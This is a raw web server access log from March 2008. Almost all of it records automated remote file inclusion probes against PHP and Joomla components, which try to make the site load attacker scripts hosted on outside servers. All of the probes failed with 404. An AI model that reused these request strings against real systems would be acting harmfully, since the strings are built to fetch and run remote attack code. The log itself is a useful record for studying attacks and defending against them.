67.15.8.53 - - [27/Mar/2008:05:00:37 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.11 - - [27/Mar/2008:05:00:42 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.8.53 - - [27/Mar/2008:05:00:58 -0700] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.11 - - [27/Mar/2008:05:01:05 -0700] "GET /logs/access_080127.log/modules/Neos_Chronos/header.php?base_folder=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.11 - - [27/Mar/2008:05:01:06 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.11 - - [27/Mar/2008:05:01:29 -0700] "GET /logs/access_080131.log/modules/Neos_Chronos/header.php?base_folder=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.191.108 - - [27/Mar/2008:05:01:34 -0700] "GET //index.php?option=com_custompages&cpage=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
217.160.191.108 - - [27/Mar/2008:05:01:35 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
67.195.44.96 - - [27/Mar/2008:05:01:41 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
219.166.61.155 - - [27/Mar/2008:05:03:12 -0700] "GET /logs/access_080128.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.166.61.155 - - [27/Mar/2008:05:03:12 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.166.61.155 - - [27/Mar/2008:05:03:12 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.191.108 - - [27/Mar/2008:05:04:27 -0700] "GET //index.php?option=com_custompages&cpage=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
217.160.191.108 - - [27/Mar/2008:05:04:27 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
200.31.206.140 - - [27/Mar/2008:05:05:29 -0700] "GET /logs/access_080223.log//oneadmin/photogallery/include.php?path[docroot]=http://www.geocities.com/vie.tian/31377.txt%20?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.31.206.140 - - [27/Mar/2008:05:05:30 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.geocities.com/vie.tian/31377.txt%20?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:06:31 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:06:31 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:06:31 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.31.48 - - [27/Mar/2008:05:06:59 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.17.225 - - [27/Mar/2008:05:07:00 -0700] "GET /bikes/GPS/WeSTOC2008/ HTTP/1.0" 200 842 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:05:07:12 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:05:07:13 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:05:07:13 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.31.206.140 - - [27/Mar/2008:05:08:07 -0700] "GET /logs/access_080225.log//oneadmin/photogallery/include.php?path[docroot]=http://www.geocities.com/vie.tian/31377.txt%20?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:05:08:21 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:05:08:22 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:05:08:22 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:08:43 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.42.217.194 - - [27/Mar/2008:05:08:44 -0700] "GET /logs/access_080225.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.shaneogden.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.42.217.194 - - [27/Mar/2008:05:08:44 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.shaneogden.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.42.217.194 - - [27/Mar/2008:05:08:44 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.shaneogden.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.103 - - [27/Mar/2008:05:09:04 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.101 - - [27/Mar/2008:05:09:05 -0700] "GET /tmp/ HTTP/1.0" 200 1488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.221.130.11 - - [27/Mar/2008:05:09:28 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.11 - - [27/Mar/2008:05:09:28 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.11 - - [27/Mar/2008:05:09:52 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.48.206 - - [27/Mar/2008:05:09:52 -0700] "GET //index.php?option=com_custompages&cpage=&mosConfig_absolute_path=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
62.141.48.206 - - [27/Mar/2008:05:09:52 -0700] "GET /logs//index.php?option=com_custompages&cpage=&mosConfig_absolute_path=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
209.200.254.85 - - [27/Mar/2008:05:10:48 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.85 - - [27/Mar/2008:05:10:48 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.85 - - [27/Mar/2008:05:10:48 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:10:56 -0700] "GET /logs/access_080313.log//index3.php?pag=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.232 - - [27/Mar/2008:05:10:56 -0700] "GET /logs/access_080313.log//index3.php?pag=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:10:57 -0700] "GET //index3.php?pag=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.232 - - [27/Mar/2008:05:10:57 -0700] "GET //index3.php?pag=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:10:57 -0700] "GET /logs//index3.php?pag=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.232 - - [27/Mar/2008:05:10:57 -0700] "GET /logs//index3.php?pag=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.236 - - [27/Mar/2008:05:10:57 -0700] "GET /logs/access_080313.log//index3.php?pag=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.236 - - [27/Mar/2008:05:10:57 -0700] "GET //index3.php?pag=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.236 - - [27/Mar/2008:05:10:57 -0700] "GET /logs//index3.php?pag=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:11:01 -0700] "GET /logs/access_080313.log//index3.php?pag=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:11:01 -0700] "GET //index3.php?pag=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:11:01 -0700] "GET /logs//index3.php?pag=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.232 - - [27/Mar/2008:05:11:04 -0700] "GET /logs/access_071230.log//index3.php?pag=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.236 - - [27/Mar/2008:05:11:04 -0700] "GET /logs/access_071230.log//index3.php?pag=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:11:06 -0700] "GET /logs/access_071230.log//index3.php?pag=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:11:06 -0700] "GET /logs/access_071230.log//index3.php?pag=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:11:08 -0700] "GET /logs/access_080225.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:11:08 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:11:09 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:11:13 -0700] "GET /logs/access_080225.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:11:14 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:11:14 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:11:14 -0700] "GET /logs/access_080312.log//archive.php?adminfolder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:11:14 -0700] "GET //archive.php?adminfolder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:11:14 -0700] "GET /logs//archive.php?adminfolder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:11:19 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:11:19 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:11:19 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:05:11:49 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.11 - - [27/Mar/2008:05:12:41 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.254.85 - - [27/Mar/2008:05:13:35 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.11 - - [27/Mar/2008:05:13:59 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.42.217.194 - - [27/Mar/2008:05:14:07 -0700] "GET /logs/access_080313.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.shaneogden.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:15:10 -0700] "GET /logs/access_080313.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:15:10 -0700] "GET /logs/access_080313.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:15:44 -0700] "GET /logs/access_080225.log//db.php?path_local=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:15:44 -0700] "GET //db.php?path_local=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:15:44 -0700] "GET /logs//db.php?path_local=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.232 - - [27/Mar/2008:05:15:47 -0700] "GET /logs/access_080225.log//db.php?path_local=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.232 - - [27/Mar/2008:05:15:47 -0700] "GET //db.php?path_local=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.232 - - [27/Mar/2008:05:15:47 -0700] "GET /logs//db.php?path_local=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.236 - - [27/Mar/2008:05:15:49 -0700] "GET /logs/access_080225.log//db.php?path_local=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.236 - - [27/Mar/2008:05:15:49 -0700] "GET //db.php?path_local=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.236 - - [27/Mar/2008:05:15:49 -0700] "GET /logs//db.php?path_local=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:16:07 -0700] "GET /logs/access_080225.log//db.php?path_local=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:16:07 -0700] "GET //db.php?path_local=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:16:07 -0700] "GET /logs//db.php?path_local=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.166.61.155 - - [27/Mar/2008:05:17:40 -0700] "GET /logs/access_080125.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:05:17:56 -0700] "GET /logs/access_080113.log/index.php?place=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:05:17:57 -0700] "GET /index.php?place=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:05:17:57 -0700] "GET /logs/index.php?place=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.232 - - [27/Mar/2008:05:17:57 -0700] "GET /logs/access_080223.log//index.php?body=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.232 - - [27/Mar/2008:05:17:58 -0700] "GET //index.php?body=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.232 - - [27/Mar/2008:05:17:58 -0700] "GET /logs//index.php?body=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:17:58 -0700] "GET /logs/access_080223.log//index.php?body=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:17:59 -0700] "GET //index.php?body=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:17:59 -0700] "GET /logs//index.php?body=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:18:06 -0700] "GET /logs/access_080223.log//index.php?body=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:18:06 -0700] "GET //index.php?body=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:18:06 -0700] "GET /logs//index.php?body=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.236 - - [27/Mar/2008:05:18:07 -0700] "GET /logs/access_080223.log//index.php?body=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.236 - - [27/Mar/2008:05:18:08 -0700] "GET //index.php?body=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.236 - - [27/Mar/2008:05:18:08 -0700] "GET /logs//index.php?body=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:05:18:51 -0700] "GET //skin/zero_vote/error.php?dir=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.56.202.30 - - [27/Mar/2008:05:19:02 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.56.202.30 - - [27/Mar/2008:05:19:02 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.56.202.30 - - [27/Mar/2008:05:19:28 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.56.202.30 - - [27/Mar/2008:05:19:29 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.253.99.164 - - [27/Mar/2008:05:20:29 -0700] "GET /logs/access_080113.log/index.php?place=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [27/Mar/2008:05:20:30 -0700] "GET /index.php?place=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [27/Mar/2008:05:20:30 -0700] "GET /logs/index.php?place=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.33.49.76 - - [27/Mar/2008:05:21:14 -0700] "GET /!scanhttp://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:05:21:34 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.215.56 - - [27/Mar/2008:05:21:40 -0700] "GET /logs/access.log//common/db.php?commonpath=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.215.56 - - [27/Mar/2008:05:21:41 -0700] "GET //common/db.php?commonpath=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.215.56 - - [27/Mar/2008:05:21:41 -0700] "GET /logs//common/db.php?commonpath=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
4.79.181.236 - - [27/Mar/2008:05:21:47 -0700] "GET /logs/access_080225.log//index.php?body=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:21:48 -0700] "GET /logs/access_080225.log//index.php?body=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
